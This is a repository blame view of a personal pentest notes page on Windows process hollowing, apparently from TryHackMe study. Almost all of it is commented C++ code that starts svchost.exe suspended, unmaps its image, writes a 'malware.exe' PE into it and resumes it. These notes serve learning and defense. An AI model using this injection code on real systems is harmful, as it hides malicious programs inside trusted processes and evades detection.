stefan
/
husk
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
husk/build/exploit/windows/process_injection/process_hollowing.html

341 lines
56 KiB
HTML
Raw Normal View History

init
2022-09-02 09:05:59 +02:00
<!doctype html>
<html lang="en">
<center>
<head>
<script src="https://cdn.jsdelivr.net/npm/fuse.js/dist/fuse.js"></script>
Added settings.toml
2022-09-09 15:41:05 +02:00
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="/static/js/auto-complete.js"></script>
<script type="text/javascript" src="/static/js/lunr.min.js"></script>
<script type="text/javascript" src="/static/js/search.js"></script>
init
2022-09-02 09:05:59 +02:00
<link rel="stylesheet" href="/static/stylesheet.css">
<link rel="stylesheet" href="/static/auto-complete.css">
<br>
Added settings.toml
2022-09-09 15:41:05 +02:00
<title>The Real Hugo</title>
init
2022-09-02 09:05:59 +02:00
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
<!-- topmenu -->
<div class="menu">
Added settings.toml
2022-09-09 15:41:05 +02:00
<a href="/" style="text-decoration:none">Husk</a>
init
2022-09-02 09:05:59 +02:00
</div>
<div class="search-container">
<label for="search-by"><i class="fas fa-search"></i></label>
<input data-search-input="" id="search-by" type="search" placeholder="Search..." autocomplete="off">
<!--button type="submit"><i class="search"></i>&#128269;</button>-->
<span data-search-clear=""><i class="fas fa-times"></i></span>
</div>
</div>
<div class="menu">
</div>
<!--br><br-->
</center>
<p></p>
<div class="columns">
<!-- Sidebar -->
<div class="column column-1">
Added settings.toml
2022-09-09 15:41:05 +02:00
<ul><details id=enumeration ontoggle="linkClick(this); return false;" ><summary>Enumeration</summary><ul><details id=containers ontoggle="linkClick(this); return false;" ><summary>Containers</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/enumeration/docs/aws.html">aws</a></li><li><a href="/enumeration/docs/cewl.html">cewl</a></li><li><a href="/enumeration/docs/dns.html">dns</a></li><li><a href="/enumeration/docs/docker_enumeration.html">docker_enumeration</a></li><li><a href="/enumeration/docs/ffuf.html">ffuf</a></li><li><a href="/enumeration/docs/gobuster.html">gobuster</a></li><li><a href="/enumeration/docs/kerberoast.html">kerberoast</a></li><li><a href="/enumeration/docs/kubectl.html">kubectl</a></li><li><a href="/enumeration/docs/ldap.html">ldap</a></li><li><a href="/enumeration/docs/linux_basics.html">linux_basics</a></li><li><a href="/enumeration/docs/microk8s.html">microk8s</a></li><li><a href="/enumeration/docs/nfs.html">nfs</a></li><li><a href="/enumeration/docs/nikto.html">nikto</a></li><li><a href="/enumeration/docs/nmap.html">nmap</a></li><li><a href="/enumeration/docs/port_knocking.html">port_knocking</a></li><li><a href="/enumeration/docs/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/docs/rsync.html">rsync</a></li><li><a href="/enumeration/docs/rustscan.html">rustscan</a></li><li><a href="/enumeration/docs/shodan.html">shodan</a></li><details id=snmp ontoggle="linkClick(this); return false;" ><summary>Snmp</summary><ul><li><a href="/enumeration/docs/snmp/onesixtyone.html">onesixtyone</a></li><li><a href="/enumeration/docs/snmp/snmpcheck.html">snmpcheck</a></li></ul></details><li><a href="/enumeration/docs/websites.html">websites</a></li><li><a href="/enumeration/docs/wfuzz.html">wfuzz</a></li><li><a href="/enumeration/docs/wpscan.html">wpscan</a></li></ul></details><details id=network_scanners ontoggle="linkClick(this); return false;" ><summary>Network_scanners</summary><ul></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/enumeration/windows/bloodhound.html">bloodhound</a></li><li><a href="/enumeration/windows/event_log.html">event_log</a></li><li><a href="/enumeration/windows/manual_enum.html">manual_enum</a></li><li><a href="/enumeration/windows/powershell.html">powershell</a></li><li><a href="/enumeration/windows/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/windows/sysinternals.html">sysinternals</a></li><li><a href="/enumeration/windows/sysmon.html">sysmon</a></li><li><a href="/enumeration/windows/vss.html">vss</a></li></ul></details></ul></details><details id=exploit ontoggle="linkClick(this); return false;" ><summary>Exploit</summary><ul><details id=CPUs ontoggle="linkClick(this); return false;" ><summary>CPUs</summary><ul><li><a href="/exploit/CPUs/meltdown.html">meltdown</a></li></ul></details><details id=binaries ontoggle="linkClick(this); return false;" ><summary>Binaries</summary><ul><li><a href="/exploit/binaries/Shellcode.html">Shellcode</a></li><li><a href="/exploit/binaries/aslr.html">aslr</a></li><details id=buffer_overflow ontoggle="linkClick(this); return false;" ><summary>Buffer_overflow</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/exploit/binaries/buffer_overflow/docs/amd64.html">amd64</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/amd64_instructions.html">amd64_instructions</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/buffer_overflow.html">buffer_overflow</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/cut_stack_in_half.html">cut_stack_in_half</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/pwntools_specifics.html">pwntools_specifics</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/ret_address_reuse.html">ret_address_reuse</a></li></ul></details><li><a href="/exploit/binaries/buffer_overflow/ropping.html">ropping</a></li></ul></details><details id=canary_bypass ontoggle="l
init
2022-09-02 09:05:59 +02:00
</ul>
</div>
<div class="column column-2">
<span class="body">
<style>pre { line-height: 125%; }
td.linenos .normal { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
.codehilite .hll { background-color: #2C3B41 }
.codehilite .c { color: #546E7A; font-style: italic } /* Comment */
.codehilite .err { color: #FF5370 } /* Error */
.codehilite .esc { color: #89DDFF } /* Escape */
.codehilite .g { color: #EEFFFF } /* Generic */
.codehilite .k { color: #BB80B3 } /* Keyword */
.codehilite .l { color: #C3E88D } /* Literal */
.codehilite .n { color: #EEFFFF } /* Name */
.codehilite .o { color: #89DDFF } /* Operator */
.codehilite .p { color: #89DDFF } /* Punctuation */
.codehilite .ch { color: #546E7A; font-style: italic } /* Comment.Hashbang */
.codehilite .cm { color: #546E7A; font-style: italic } /* Comment.Multiline */
.codehilite .cp { color: #546E7A; font-style: italic } /* Comment.Preproc */
.codehilite .cpf { color: #546E7A; font-style: italic } /* Comment.PreprocFile */
.codehilite .c1 { color: #546E7A; font-style: italic } /* Comment.Single */
.codehilite .cs { color: #546E7A; font-style: italic } /* Comment.Special */
.codehilite .gd { color: #FF5370 } /* Generic.Deleted */
.codehilite .ge { color: #89DDFF } /* Generic.Emph */
.codehilite .gr { color: #FF5370 } /* Generic.Error */
.codehilite .gh { color: #C3E88D } /* Generic.Heading */
.codehilite .gi { color: #C3E88D } /* Generic.Inserted */
.codehilite .go { color: #546E7A } /* Generic.Output */
.codehilite .gp { color: #FFCB6B } /* Generic.Prompt */
.codehilite .gs { color: #FF5370 } /* Generic.Strong */
.codehilite .gu { color: #89DDFF } /* Generic.Subheading */
.codehilite .gt { color: #FF5370 } /* Generic.Traceback */
.codehilite .kc { color: #89DDFF } /* Keyword.Constant */
.codehilite .kd { color: #BB80B3 } /* Keyword.Declaration */
.codehilite .kn { color: #89DDFF; font-style: italic } /* Keyword.Namespace */
.codehilite .kp { color: #89DDFF } /* Keyword.Pseudo */
.codehilite .kr { color: #BB80B3 } /* Keyword.Reserved */
.codehilite .kt { color: #BB80B3 } /* Keyword.Type */
.codehilite .ld { color: #C3E88D } /* Literal.Date */
.codehilite .m { color: #F78C6C } /* Literal.Number */
.codehilite .s { color: #C3E88D } /* Literal.String */
.codehilite .na { color: #BB80B3 } /* Name.Attribute */
.codehilite .nb { color: #82AAFF } /* Name.Builtin */
.codehilite .nc { color: #FFCB6B } /* Name.Class */
.codehilite .no { color: #EEFFFF } /* Name.Constant */
.codehilite .nd { color: #82AAFF } /* Name.Decorator */
.codehilite .ni { color: #89DDFF } /* Name.Entity */
.codehilite .ne { color: #FFCB6B } /* Name.Exception */
.codehilite .nf { color: #82AAFF } /* Name.Function */
.codehilite .nl { color: #82AAFF } /* Name.Label */
.codehilite .nn { color: #FFCB6B } /* Name.Namespace */
.codehilite .nx { color: #EEFFFF } /* Name.Other */
.codehilite .py { color: #FFCB6B } /* Name.Property */
.codehilite .nt { color: #FF5370 } /* Name.Tag */
.codehilite .nv { color: #89DDFF } /* Name.Variable */
.codehilite .ow { color: #89DDFF; font-style: italic } /* Operator.Word */
.codehilite .w { color: #EEFFFF } /* Text.Whitespace */
.codehilite .mb { color: #F78C6C } /* Literal.Number.Bin */
.codehilite .mf { color: #F78C6C } /* Literal.Number.Float */
.codehilite .mh { color: #F78C6C } /* Literal.Number.Hex */
.codehilite .mi { color: #F78C6C } /* Literal.Number.Integer */
.codehilite .mo { color: #F78C6C } /* Literal.Number.Oct */
.codehilite .sa { color: #BB80B3 } /* Literal.String.Affix */
.codehilite .sb { color: #C3E88D } /* Literal.String.Backtick */
.codehilite .sc { color: #C3E88D } /* Literal.String.Char */
.codehilite .dl { color: #EEFFFF } /* Literal.String.Delimiter */
.codehilite .sd { color: #546E7A; font-style: italic } /* Literal.String.Doc */
.codehilite .s2 { color: #C3E88D } /* Literal.String.Double */
.codehilite .se { color: #EEFFFF } /* Literal.String.Escape */
.codehilite .sh { color: #C3E88D } /* Literal.String.Heredoc */
.codehilite .si { color: #89DDFF } /* Literal.String.Interpol */
.codehilite .sx { color: #C3E88D } /* Literal.String.Other */
.codehilite .sr { color: #89DDFF } /* Literal.String.Regex */
.codehilite .s1 { color: #C3E88D } /* Literal.String.Single */
.codehilite .ss { color: #89DDFF } /* Literal.String.Symbol */
.codehilite .bp { color: #89DDFF } /* Name.Builtin.Pseudo */
.codehilite .fm { color: #82AAFF } /* Name.Function.Magic */
.codehilite .vc { color: #89DDFF } /* Name.Variable.Class */
.codehilite .vg { color: #89DDFF } /* Name.Variable.Global */
.codehilite .vi { color: #89DDFF } /* Name.Variable.Instance */
.codehilite .vm { color: #82AAFF } /* Name.Variable.Magic */
.codehilite .il { color: #F78C6C } /* Literal.Number.Integer.Long */</style>
<div class="column column-3">
<ul>
<li><a href="#process-hollowing">Process Hollowing</a></li>
</ul>
</div>
<h1 id="process-hollowing">Process Hollowing</h1>
<ul>
<li>Target process which is in suspended state has to be created</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="n">LPSTARTUPINFOA</span><span class="w"> </span><span class="n">target_si</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">new</span><span class="w"> </span><span class="n">STARTUPINFOA</span><span class="p">();</span><span class="w"> </span><span class="c1">// Defines station, desktop, handles, and appearance of a process</span>
<span class="n">LPPROCESS_INFORMATION</span><span class="w"> </span><span class="n">target_pi</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">new</span><span class="w"> </span><span class="n">PROCESS_INFORMATION</span><span class="p">();</span><span class="w"> </span><span class="c1">// Information about the process and primary thread</span>
<span class="n">CONTEXT</span><span class="w"> </span><span class="n">c</span><span class="p">;</span><span class="w"> </span><span class="c1">// Context structure pointer</span>
<span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">CreateProcessA</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">LPSTR</span><span class="p">)</span><span class="s">&quot;C:</span><span class="se">\\\\</span><span class="s">Windows</span><span class="se">\\\\</span><span class="s">System32</span><span class="se">\\\\</span><span class="s">svchost.exe&quot;</span><span class="p">,</span><span class="w"> </span><span class="c1">// Name of module to execute</span>
<span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">TRUE</span><span class="p">,</span><span class="w"> </span><span class="c1">// Handles are inherited from the calling process</span>
<span class="w"> </span><span class="n">CREATE_SUSPENDED</span><span class="p">,</span><span class="w"> </span><span class="c1">// New process is suspended</span>
<span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">target_si</span><span class="p">,</span><span class="w"> </span><span class="c1">// pointer to startup info</span>
<span class="w"> </span><span class="n">target_pi</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// pointer to process information</span>
<span class="w"> </span><span class="n">cout</span><span class="w"> </span><span class="o">&lt;&lt;</span><span class="w"> </span><span class="s">&quot;[!] Failed to create Target process. Last Error: &quot;</span><span class="w"> </span><span class="o">&lt;&lt;</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
</code></pre></div>
<ul>
<li>Malicious image has to be opened</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="n">HANDLE</span><span class="w"> </span><span class="n">hMaliciousCode</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">CreateFileA</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">LPCSTR</span><span class="p">)</span><span class="s">&quot;C:</span><span class="se">\\\\</span><span class="s">Users</span><span class="se">\\\\</span><span class="s">tryhackme</span><span class="se">\\\\</span><span class="s">malware.exe&quot;</span><span class="p">,</span><span class="w"> </span><span class="c1">// Name of image</span>
<span class="w"> </span><span class="n">GENERIC_READ</span><span class="p">,</span><span class="w"> </span><span class="c1">// Read-only access</span>
<span class="w"> </span><span class="n">FILE_SHARE_READ</span><span class="p">,</span><span class="w"> </span><span class="c1">// Read-only share mode</span>
<span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">OPEN_EXISTING</span><span class="p">,</span><span class="w"> </span><span class="c1">// Instructed to open a file or device if it exists</span>
<span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nb">NULL</span><span class="w"></span>
<span class="p">);</span><span class="w"></span>
</code></pre></div>
<ul>
<li>Unmap memory from the process </li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="n">c</span><span class="p">.</span><span class="n">ContextFlags</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">CONTEXT_INTEGER</span><span class="p">;</span><span class="w"> </span><span class="c1">// Only stores CPU registers in the pointer</span>
<span class="n">GetThreadContext</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">target_pi</span><span class="o">-&gt;</span><span class="n">hThread</span><span class="p">,</span><span class="w"> </span><span class="c1">// Handle to the thread obtained from the PROCESS_INFORMATION structure</span>
<span class="w"> </span><span class="o">&amp;</span><span class="n">c</span><span class="w"> </span><span class="c1">// Pointer to store retrieved context</span>
<span class="p">);</span><span class="w"> </span><span class="c1">// Obtains the current thread context</span>
<span class="n">PVOID</span><span class="w"> </span><span class="n">pTargetImageBaseAddress</span><span class="p">;</span><span class="w"> </span>
<span class="n">ReadProcessMemory</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">target_pi</span><span class="o">-&gt;</span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="c1">// Handle for the process obtained from the PROCESS_INFORMATION structure</span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)(</span><span class="n">c</span><span class="p">.</span><span class="n">Ebx</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">8</span><span class="p">),</span><span class="w"> </span><span class="c1">// Pointer to the base address</span>
<span class="w"> </span><span class="o">&amp;</span><span class="n">pTargetImageBaseAddress</span><span class="p">,</span><span class="w"> </span><span class="c1">// Store target base address </span>
<span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">PVOID</span><span class="p">),</span><span class="w"> </span><span class="c1">// Bytes to read </span>
<span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="c1">// Number of bytes out</span>
<span class="p">);</span><span class="w"></span>
</code></pre></div>
<ul>
<li>Allocate and write into the memory unmapped</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="n">DWORD</span><span class="w"> </span><span class="n">maliciousFileSize</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GetFileSize</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hMaliciousCode</span><span class="p">,</span><span class="w"> </span><span class="c1">// Handle of malicious image</span>
<span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="c1">// Returns no error</span>
<span class="p">);</span><span class="w"></span>
<span class="n">PVOID</span><span class="w"> </span><span class="n">pMaliciousImage</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">VirtualAlloc</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">maliciousFileSize</span><span class="p">,</span><span class="w"> </span><span class="c1">// File size of malicious image</span>
<span class="w"> </span><span class="mh">0x3000</span><span class="p">,</span><span class="w"> </span><span class="c1">// Reserves and commits pages (MEM_RESERVE | MEM_COMMIT)</span>
<span class="w"> </span><span class="mh">0x04</span><span class="w"> </span><span class="c1">// Enables read/write access (PAGE_READWRITE)</span>
<span class="p">);</span><span class="w"></span>
</code></pre></div>
<div class="codehilite"><pre><span></span><code><span class="n">DWORD</span><span class="w"> </span><span class="n">numberOfBytesRead</span><span class="p">;</span><span class="w"> </span><span class="c1">// Stores number of bytes read</span>
<span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">ReadFile</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hMaliciousCode</span><span class="p">,</span><span class="w"> </span><span class="c1">// Handle of malicious image</span>
<span class="w"> </span><span class="n">pMaliciousImage</span><span class="p">,</span><span class="w"> </span><span class="c1">// Allocated region of memory</span>
<span class="w"> </span><span class="n">maliciousFileSize</span><span class="p">,</span><span class="w"> </span><span class="c1">// File size of malicious image</span>
<span class="w"> </span><span class="o">&amp;</span><span class="n">numberOfBytesRead</span><span class="p">,</span><span class="w"> </span><span class="c1">// Number of bytes read</span>
<span class="w"> </span><span class="nb">NULL</span><span class="w"></span>
<span class="w"> </span><span class="p">))</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">cout</span><span class="w"> </span><span class="o">&lt;&lt;</span><span class="w"> </span><span class="s">&quot;[!] Unable to read Malicious file into memory. Error: &quot;</span><span class="w"> </span><span class="o">&lt;&lt;</span><span class="n">GetLastError</span><span class="p">()</span><span class="o">&lt;&lt;</span><span class="w"> </span><span class="n">endl</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">TerminateProcess</span><span class="p">(</span><span class="n">target_pi</span><span class="o">-&gt;</span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">hMaliciousCode</span><span class="p">);</span><span class="w"></span>
</code></pre></div>
<ul>
<li>Get handle of dll</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="n">HMODULE</span><span class="w"> </span><span class="n">hNtdllBase</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GetModuleHandleA</span><span class="p">(</span><span class="s">&quot;ntdll.dll&quot;</span><span class="p">);</span><span class="w"> </span><span class="c1">// Obtains the handle for ntdll</span>
<span class="n">pfnZwUnmapViewOfSection</span><span class="w"> </span><span class="n">pZwUnmapViewOfSection</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">pfnZwUnmapViewOfSection</span><span class="p">)</span><span class="n">GetProcAddress</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hNtdllBase</span><span class="p">,</span><span class="w"> </span><span class="c1">// Handle of ntdll</span>
<span class="w"> </span><span class="s">&quot;ZwUnmapViewOfSection&quot;</span><span class="w"> </span><span class="c1">// API call to obtain</span>
<span class="p">);</span><span class="w"> </span><span class="c1">// Obtains ZwUnmapViewOfSection from ntdll</span>
<span class="n">DWORD</span><span class="w"> </span><span class="n">dwResult</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">pZwUnmapViewOfSection</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">target_pi</span><span class="o">-&gt;</span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="c1">// Handle of the process obtained from the PROCESS_INFORMATION structure</span>
<span class="w"> </span><span class="n">pTargetImageBaseAddress</span><span class="w"> </span><span class="c1">// Base address of the process</span>
<span class="p">);</span><span class="w"></span>
</code></pre></div>
<ul>
<li>Allocate memory for the target process</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="n">PIMAGE_DOS_HEADER</span><span class="w"> </span><span class="n">pDOSHeader</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">PIMAGE_DOS_HEADER</span><span class="p">)</span><span class="n">pMaliciousImage</span><span class="p">;</span><span class="w"> </span><span class="c1">// Obtains the DOS header from the malicious image</span>
<span class="n">PIMAGE_NT_HEADERS</span><span class="w"> </span><span class="n">pNTHeaders</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">PIMAGE_NT_HEADERS</span><span class="p">)((</span><span class="n">LPBYTE</span><span class="p">)</span><span class="n">pMaliciousImage</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pDOSHeader</span><span class="o">-&gt;</span><span class="n">e_lfanew</span><span class="p">);</span><span class="w"> </span><span class="c1">// Obtains the NT header from e_lfanew</span>
<span class="n">DWORD</span><span class="w"> </span><span class="n">sizeOfMaliciousImage</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">pNTHeaders</span><span class="o">-&gt;</span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">SizeOfImage</span><span class="p">;</span><span class="w"> </span><span class="c1">// Obtains the size of the optional header from the NT header structure</span>
<span class="n">PVOID</span><span class="w"> </span><span class="n">pHollowAddress</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">VirtualAllocEx</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">target_pi</span><span class="o">-&gt;</span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="c1">// Handle of the process obtained from the PROCESS_INFORMATION structure</span>
<span class="w"> </span><span class="n">pTargetImageBaseAddress</span><span class="p">,</span><span class="w"> </span><span class="c1">// Base address of the process</span>
<span class="w"> </span><span class="n">sizeOfMaliciousImage</span><span class="p">,</span><span class="w"> </span><span class="c1">// Byte size obtained from optional header</span>
<span class="w"> </span><span class="mh">0x3000</span><span class="p">,</span><span class="w"> </span><span class="c1">// Reserves and commits pages (MEM_RESERVE | MEM_COMMIT)</span>
<span class="w"> </span><span class="mh">0x40</span><span class="w"> </span><span class="c1">// Enabled execute and read/write access (PAGE_EXECUTE_READWRITE)</span>
<span class="p">);</span><span class="w"></span>
</code></pre></div>
<ul>
<li>Write to the process memory</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">WriteProcessMemory</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">target_pi</span><span class="o">-&gt;</span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="c1">// Handle of the process obtained from the PROCESS_INFORMATION structure</span>
<span class="w"> </span><span class="n">pTargetImageBaseAddress</span><span class="p">,</span><span class="w"> </span><span class="c1">// Base address of the process</span>
<span class="w"> </span><span class="n">pMaliciousImage</span><span class="p">,</span><span class="w"> </span><span class="c1">// Local memory where the malicious file resides</span>
<span class="w"> </span><span class="n">pNTHeaders</span><span class="o">-&gt;</span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">SizeOfHeaders</span><span class="p">,</span><span class="w"> </span><span class="c1">// Byte size of PE headers </span>
<span class="w"> </span><span class="nb">NULL</span><span class="w"></span>
<span class="p">))</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">cout</span><span class="o">&lt;&lt;</span><span class="w"> </span><span class="s">&quot;[!] Writting Headers failed. Error: &quot;</span><span class="w"> </span><span class="o">&lt;&lt;</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">()</span><span class="w"> </span><span class="o">&lt;&lt;</span><span class="w"> </span><span class="n">endl</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<div class="codehilite"><pre><span></span><code><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o">&lt;</span><span class="w"> </span><span class="n">pNTHeaders</span><span class="o">-&gt;</span><span class="n">FileHeader</span><span class="p">.</span><span class="n">NumberOfSections</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="o">++</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// Loop based on number of sections in PE data</span>
<span class="w"> </span><span class="n">PIMAGE_SECTION_HEADER</span><span class="w"> </span><span class="n">pSectionHeader</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">PIMAGE_SECTION_HEADER</span><span class="p">)((</span><span class="n">LPBYTE</span><span class="p">)</span><span class="n">pMaliciousImage</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pDOSHeader</span><span class="o">-&gt;</span><span class="n">e_lfanew</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">IMAGE_NT_HEADERS</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">(</span><span class="n">i</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">IMAGE_SECTION_HEADER</span><span class="p">)));</span><span class="w"> </span><span class="c1">// Determines the current PE section header</span>
<span class="w"> </span><span class="n">WriteProcessMemory</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">target_pi</span><span class="o">-&gt;</span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="c1">// Handle of the process obtained from the PROCESS_INFORMATION structure</span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)((</span><span class="n">LPBYTE</span><span class="p">)</span><span class="n">pHollowAddress</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pSectionHeader</span><span class="o">-&gt;</span><span class="n">VirtualAddress</span><span class="p">),</span><span class="w"> </span><span class="c1">// Base address of current section </span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)((</span><span class="n">LPBYTE</span><span class="p">)</span><span class="n">pMaliciousImage</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pSectionHeader</span><span class="o">-&gt;</span><span class="n">PointerToRawData</span><span class="p">),</span><span class="w"> </span><span class="c1">// Pointer for content of current section</span>
<span class="w"> </span><span class="n">pSectionHeader</span><span class="o">-&gt;</span><span class="n">SizeOfRawData</span><span class="p">,</span><span class="w"> </span><span class="c1">// Byte size of current section</span>
<span class="w"> </span><span class="nb">NULL</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<ul>
<li>Set entrypoint</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="n">c</span><span class="p">.</span><span class="n">Eax</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">SIZE_T</span><span class="p">)((</span><span class="n">LPBYTE</span><span class="p">)</span><span class="n">pHollowAddress</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pNTHeaders</span><span class="o">-&gt;</span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">AddressOfEntryPoint</span><span class="p">);</span><span class="w"> </span><span class="c1">// Set the context structure pointer to the entry point from the PE optional header</span>
<span class="n">SetThreadContext</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">target_pi</span><span class="o">-&gt;</span><span class="n">hThread</span><span class="p">,</span><span class="w"> </span><span class="c1">// Handle to the thread obtained from the PROCESS_INFORMATION structure</span>
<span class="w"> </span><span class="o">&amp;</span><span class="n">c</span><span class="w"> </span><span class="c1">// Pointer to the stored context structure</span>
<span class="p">);</span><span class="w"></span>
</code></pre></div>
<ul>
<li>Switch process state to running</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="n">ResumeThread</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">target_pi</span><span class="o">-&gt;</span><span class="n">hThread</span><span class="w"> </span><span class="c1">// Handle to the thread obtained from the PROCESS_INFORMATION structure</span>
<span class="p">);</span><span class="w"></span>
</code></pre></div>
</span>
</div>
</div>
<div id="footer">
<p></p>
<center>
&copy; Stefan Friese
</center>
</div>
<script>
Added settings.toml
2022-09-09 15:41:05 +02:00
function linkClick(obj) {
init
2022-09-02 09:05:59 +02:00
if (obj.open) {
Added settings.toml
